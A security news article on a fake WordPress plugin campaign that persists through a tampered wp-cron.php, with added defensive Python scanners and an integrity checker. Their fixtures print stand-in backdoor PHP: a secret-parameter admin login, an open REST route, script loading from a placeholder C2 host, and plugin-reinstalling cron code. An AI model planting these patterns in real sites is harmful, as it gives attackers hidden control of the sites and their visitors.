Fake WordPress plugin hijacks sites with stealth backdoor

Attackers are using a fake WordPress security plugin that silently hijacks websites, reinstalls itself after deletion, and gives them hidden administrator access.


What happened

A new malware campaign is targeting WordPress websites with a plugin that masquerades as a security tool, tricking site owners into installing it. According to researchers at Wordfence, the plugin gives attackers persistent access, remote code execution, and the ability to inject JavaScript into pages, while hiding itself from the plugin list in the WordPress dashboard to avoid detection.

The campaign was first uncovered during a routine site cleanup in January 2025, in which Wordfence analysts found a tampered wp-cron.php file. That file silently recreates and activates the backdoor plugin, typically named WP-antymalwary-bot.php.


Going deeper

The same malicious plugin has been seen under other file names, including addons.php, wpconsole.php, and wp-performance-booster.php. Deleting it does not end the infection: the attackers also modify the core wp-cron.php file so that ordinary page visits, which trigger WordPress's cron, write the plugin file back and reactivate it.

The initial access vector is not confirmed; researchers suspect stolen FTP credentials or a weakness in the web hosting account. The malware reports to a command-and-control server hosted in Cyprus, and the overall method closely resembles a supply chain attack seen in June 2024.

Once installed, the plugin runs a self-check to confirm its components are in place, then exposes a hidden login path. A request carrying the attackers' secret password makes the malware look up an administrator account in the database and log the requester in as that user, with no credentials for that account required, giving full control of the site.

The plugin also registers a custom REST API route that any unauthenticated requester can call, which lets the attackers inject malicious code, clear plugin caches, or edit theme files without ever logging in normally. Newer versions additionally inject hidden JavaScript into the site's header, most likely to redirect visitors to scam pages, serve spam ads, or commit click fraud.
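As an added illustration (my own code, not Wordfence's tooling and not the malware itself), the following Python script statically scans plugin source for the four behaviours described above: self-removal from the plugin list via the all_plugins filter, a login (wp_set_auth_cookie) triggered by a request parameter, a REST route whose permission_callback is __return_true, and a script tag emitted on wp_head. The two plugin sources are constructed stand-ins, and the regexes are heuristics of my own rather than signatures from the report.

```python
"""Static indicator scan for the backdoor behaviours described above.

Added example: not Wordfence's tooling and not the malware. The two
plugin sources are constructed stand-ins; the patterns are heuristics.
"""
from __future__ import annotations

import re
from pathlib import Path

# Each indicator: (name, regex). DOTALL lets a pattern span lines, and the
# bounded lazy quantifiers keep "A ... B" matches local to one hook body.
INDICATORS = [
    # Removes its own entry from the Plugins page (the all_plugins filter).
    ("hides_from_plugin_list", r"add_filter\(\s*['\"]all_plugins['\"]"),
    # Logs a requester in based on a request parameter, no credentials.
    ("request_triggered_login",
     r"\$_(?:GET|POST|REQUEST)\b.{0,400}?wp_set_auth_cookie\s*\("),
    # REST route callable by anyone: permission_callback => __return_true.
    ("unauthenticated_rest_route",
     r"register_rest_route\s*\(.{0,600}?permission_callback['\"]\s*=>\s*['\"]__return_true['\"]"),
    # Script tag emitted into the front-end header.
    ("header_script_injection", r"add_action\(\s*['\"]wp_head['\"].{0,400}?<script"),
]


def scan_plugin_source(source: str) -> list[str]:
    """Return the names of indicators present in one plugin's PHP source."""
    return [name for name, pattern in INDICATORS
            if re.search(pattern, source, re.DOTALL)]


def scan_plugin_dir(plugins_dir: Path) -> dict[str, list[str]]:
    """Scan every .php file under wp-content/plugins; keep only files with hits."""
    hits: dict[str, list[str]] = {}
    for php in sorted(plugins_dir.rglob("*.php")):
        found = scan_plugin_source(php.read_text(errors="replace"))
        if found:
            hits[php.relative_to(plugins_dir).as_posix()] = found
    return hits


# Constructed stand-in showing the four behaviours (not the real sample).
MALICIOUS_PLUGIN = r'''<?php
/* Plugin Name: Security Booster (fake) */
add_filter('all_plugins', function ($plugins) {
    unset($plugins[plugin_basename(__FILE__)]);
    return $plugins;
});
add_action('init', function () {
    if (isset($_GET['emergencylogin']) && $_GET['emergencylogin'] === 'secret') {
        $admins = get_users(['role' => 'administrator']);
        wp_set_auth_cookie($admins[0]->ID);
    }
});
add_action('rest_api_init', function () {
    register_rest_route('wp/v1', '/cmd', [
        'callback' => 'run_cmd',
        'permission_callback' => '__return_true',
    ]);
});
add_action('wp_head', function () {
    echo '<script src="https://c2.example.invalid/x.js"></script>';
});
'''

# Constructed benign plugin: its REST route is gated by a capability check.
BENIGN_PLUGIN = r'''<?php
/* Plugin Name: Example Widget */
add_action('rest_api_init', function () {
    register_rest_route('example/v1', '/settings', [
        'callback' => 'example_get_settings',
        'permission_callback' => function () {
            return current_user_can('manage_options');
        },
    ]);
});
'''

if __name__ == "__main__":
    print("malicious:", scan_plugin_source(MALICIOUS_PLUGIN))
    print("benign:   ", scan_plugin_source(BENIGN_PLUGIN))
```

Point scan_plugin_dir at a site's wp-content/plugins directory to triage a whole install. A hit on any single indicator is not proof of compromise (legitimate plugins do emit scripts on wp_head, and some public REST endpoints are intentionally open), but a file that trips all four, or one that is active yet absent from the Plugins page, should be pulled for manual review.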


What was said

Wordfence reported: “We highlighted an interesting piece of malware that masquerades as a legitimate plugin. It allows attackers to log in to compromised sites, infect theme headers, and maintain persistent access. This malware may signal that threat actors are beginning to use AI to create more convincing, legitimate-looking malicious code.”

Researchers also warned that the malware's stealth tactics and its ability to reinstall itself after deletion make it especially dangerous.


The big picture

For site owners, this attack reinforces the need for strict plugin hygiene (install only from trusted sources and remove anything unrecognized), regular file integrity checks against known-good core checksums, and close monitoring of key system files such as wp-cron.php. As WordPress continues to dominate as a website platform, its popularity makes it an attractive target for attackers seeking scalable entry points into the web ecosystem.
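To make "file integrity checks" concrete, here is an added Python example (my own, not a Wordfence tool) that baselines SHA-256 hashes of a WordPress tree, reports files added, removed or modified on a later run, and applies a content heuristic to wp-cron.php, which in core only bootstraps WordPress and runs due cron hooks and should never write files or activate plugins. The tree it scans is built in a temporary directory from constructed stand-in files so the demo runs offline; the tamper patterns are my own rule of thumb, not indicators from the report.

```python
"""File-integrity baseline for a WordPress tree, as an added example.

Not Wordfence's tooling. The tree below is constructed in a temporary
directory with stand-in files so the script runs offline.
"""
from __future__ import annotations

import hashlib
import json
import re
import tempfile
from pathlib import Path

# Core wp-cron.php only loads WordPress and runs due cron hooks. Any of
# these in it is a tamper heuristic (assumption: a practical rule of thumb).
CRON_TAMPER_PATTERNS = [
    r"file_put_contents\s*\(",
    r"activate_plugin\s*\(",
    r"base64_decode\s*\(",
    r"\beval\s*\(",
]


def build_manifest(root: Path) -> dict[str, str]:
    """Map each file under root (relative POSIX path) to its SHA-256 hex digest."""
    manifest: dict[str, str] = {}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        manifest[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return manifest


def diff_manifest(baseline: dict[str, str], current: dict[str, str]) -> dict[str, list[str]]:
    """Report files that appeared, vanished, or changed since the baseline."""
    common = baseline.keys() & current.keys()
    return {
        "added": sorted(current.keys() - baseline.keys()),
        "removed": sorted(baseline.keys() - current.keys()),
        "modified": sorted(k for k in common if baseline[k] != current[k]),
    }


def cron_tamper_indicators(source: str) -> list[str]:
    """Patterns from CRON_TAMPER_PATTERNS present in a wp-cron.php source."""
    return [p for p in CRON_TAMPER_PATTERNS if re.search(p, source)]


def demo() -> dict:
    """Baseline a stand-in install, simulate the described compromise, re-check."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        plugins = root / "wp-content" / "plugins"
        plugins.mkdir(parents=True)
        cron = root / "wp-cron.php"
        # Constructed stand-ins, not real core files.
        cron.write_text("<?php\nrequire_once __DIR__ . '/wp-load.php';\n// run due cron hooks\n")
        (root / "wp-load.php").write_text("<?php // stand-in for core bootstrap\n")
        baseline = build_manifest(root)

        # Simulate the compromise: wp-cron.php gains code that rewrites and
        # reactivates the backdoor plugin, and the plugin file appears on disk.
        cron.write_text(cron.read_text()
                        + "file_put_contents(WP_PLUGIN_DIR . '/WP-antymalwary-bot.php', base64_decode($payload));\n"
                        + "activate_plugin('WP-antymalwary-bot.php');\n")
        (plugins / "WP-antymalwary-bot.php").write_text("<?php // backdoor stand-in\n")

        report = diff_manifest(baseline, build_manifest(root))
        report["cron_indicators"] = cron_tamper_indicators(cron.read_text())
        return report


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

On a real install you would baseline the live document root immediately after a clean deploy, store the manifest off the web server (a manifest the attacker can rewrite is worthless), and re-run build_manifest from cron or a CI job. For core files, WP-CLI's `wp core verify-checksums` compares the install against the checksums WordPress.org publishes for that version and catches a tampered wp-cron.php without a self-maintained baseline; the manifest approach above also covers wp-content, which is where the plugin file itself lands.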


FAQs

Why do attackers target WordPress plugins?

Plugins run with the same PHP privileges as WordPress core and can hook into almost any part of the site, yet they receive far less scrutiny than core files, which makes them a convenient place to hide a backdoor.


How do attackers hide malicious plugins from the dashboard?

The plugin hooks the filter WordPress applies when building the plugin list (all_plugins) and removes its own entry, so it never appears on the Plugins page even though it is still active and still present on disk. Listing the plugins directory on the filesystem, rather than trusting the dashboard, exposes it.


What makes wp-cron.php a useful tool for attackers?

wp-cron.php is WordPress's pseudo-cron: it is triggered by ordinary page loads and runs whatever scheduled work is due. Because it executes on normal traffic and is rarely inspected, code planted in it can quietly recreate and reactivate the malicious plugin whenever the plugin is removed.


Can AI really help attackers make better malware?

It can help. Wordfence suggested the polish of this code may indicate AI assistance, and generated code can produce plugin-like structure and comments that pass a casual review. It does not change the underlying indicators, such as a tampered core file or an unauthenticated REST route, which integrity and behavioral checks still catch.


What’s the risk if I ignore a suspicious plugin or file?

You could be handing full control of your site to attackers, risking SEO damage, stolen user data, malicious redirects served to your visitors, or your site being used as part of a broader botnet.